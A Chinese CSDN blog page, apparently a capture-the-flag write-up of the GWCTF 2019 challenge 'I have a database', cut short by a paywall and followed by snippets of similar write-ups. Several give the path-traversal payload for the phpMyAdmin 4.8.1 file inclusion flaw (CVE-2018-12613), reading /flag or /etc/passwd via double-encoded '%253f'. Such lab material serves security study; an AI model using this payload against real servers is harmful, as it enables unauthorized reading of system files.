[GWCTF 2019] web题-我有一个数据库

最新推荐文章于 2022-10-12 11:25:45 发布
最新推荐文章于 2022-10-12 11:25:45 发布
阅读量1.7k 收藏 2
点赞数
分类专栏: CTF练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BROTHERYY/article/details/107682948
版权
本文介绍了在GWCTF 2019网络安全竞赛中,作者如何通过猜测存在phpmyadmin并利用4.8.0-4.8.1版本的文件包含漏洞,成功执行payload并修改内容获得flag的过程。
摘要由CSDN通过智能技术生成

复现环境:buuoj.cn

我是从题目猜到有phpmyadmin,直接就输入就进去了

在这里插入图片描述
看一下版本信息
在这里插入图片描述

phpmyadmin4.8.0-4.8.1存在文件包含漏洞
使用网上的payload直接打

?target=db_datadict.php%253f/../../../..
最低0.47元/天 解锁文章
BROTHERYY
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUU刷--[GWCTF 2019]我有一个数据库
weixin_48631429的博客
12-02 573
我有一个数据库 打开看到这样一堆文字,读不懂,也没有其他的信息。 怎么想也想不到该怎么做,buu还不能扫描。所以只能看了wp,看到有一个/phpmyadmin,回来开始想怎么做 phpmyadmin版本信息4.8.1,搜索一下有什么漏洞。 任意文件包含:那么我们就可以利用来读flag ?target=db_datadict.php%253f/../../../../../../../../../flag 拿到flag 考点就是CVE-2018-12613 ...
DES加密、DES解密、AES加密、AES解密
06-26
个人例子,VS2013,DES加密、DES解密,AES加密,AES解密,
[GWCTF 2019]我有一个数据库
Yb_140的博客
10-12 563
进行两次编码,两次编码的值就是%253f,第一次url解码是由服务器自动解码的,然后经过urldecode之后变为?截取前面的值,所以前面我们传入一个在白名单里的值。4.不能在 $target_blacklist数组里面(即不能为import.php,export.php)经过 urldecode 函数解码后的 $_page 存在在 $whitelist 中返回 true。如果 $_page 存在在 $whitelist 中返回 true;$page 如果存在在 $whitelist 中返回 true;
web buuctf [GWCTF 2019]我有一个数据库1
weixin_44214568的博客
03-26 3471
1.直接放弃御剑了,在buu上扫不到,我自己登录先看了一下有没有robots.txt,有,但是没有扫到,我用了disearch,设置了s之后可以扫到了 py dirsearch -u url -e * -s 1 扫描出来
[GWCTF 2019]我有一个数据库 1
qq_43618536的博客
07-21 717
[GWCTF 2019]我有一个数据库 1
el函数的使用文档
07-09
接下来,需要在项目的`WEB-INF/tlds`目录下创建一个TLD(Tag Library Descriptor)文件,用于描述自定义EL函数的信息。TLD文件通常以`.tld`为扩展名。在这个文件中,需要指定函数的名称、函数所在的类以及函数的签名...
第三十九——[GWCTF 2019]我有一个数据库
分享简单的安全技术
04-24 336
目地址:https://buuoj.cn/challenges 解思路 第一步:进入目,一堆乱码,使用diirsearch获取到了phpmyadmin这个目录 第二步:访问phpadmin目录,查看到了当前版本4.8.1,经查该版本有远程文件包含漏洞,与第一漏洞一样 第三步:查看漏洞发现需要上传target参数且满足一定要求,构造:phpmyadmin/?target=db_sql.php?/../../../../../../flag获取flag ...
[GWCTF 2019]我有一个数据库1
qq_63169208的博客
06-26 466
进来是一堆乱码,查看源码,抓包都没发现什么,这个时候就只能用dirsearch去扫一下了可以看到有个/phpmyadmin界面访问一下得到这样一个界面,关注的点应该在下面这个,一般这种都是查一下版本漏洞这个是存在这样一个漏洞的phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)接下来执行一下漏洞复现payload:phpmyadmin/?target=db_sql.php%253f/../../../../../../../../etc/passwd执行成功,既然/etc/pa
BUUCTF_Web_[GWCTF 2019]我有一个数据库
阿刁〇的博客
08-22 596
BUUCTF_Web_[GWCTF 2019]我有一个数据库考查cve-2018-12613-PhpMyadmin后台文件包含漏洞* 漏洞分析 phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在
BUUCTF Web [GWCTF 2019]我有一个数据库1 & [BJDCTF2020]Mark loves cat1
网安小趴菜
09-20 666
BUUCTF Web [GWCTF 2019]我有一个数据库1 & [BJDCTF2020]Mark loves cat1
[GWCTF 2019]我有一个数据库 wp
m0_55185160的博客
04-23 4378
得到了/phpmyadmin/路径,加上目是我有一个数据库,于是想到应该本就是和phpmyadmin数据库有关 我们可以看到phpmyadmin的版本为4.8.1,搜索后发现这个版本的phpmyadmin存在漏洞CVE-2018-12613,下面我们复现一下漏洞。 首先分析一下源码: index.php 关于target的部分 $target_blacklist = array ( 'imp..
[GWCTF2019]huyao
最新发布
07-28
\[GWCTF2019\]huyao是一个CTF比赛中的目。根据引用\[1\]和引用\[2\]的内容,它可能涉及到频域盲水印隐写。具体的解方法和细节需要参赛者在比赛中进行分析和解决。 #### 引用[.reference_title] - *1* [BUUCTF ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值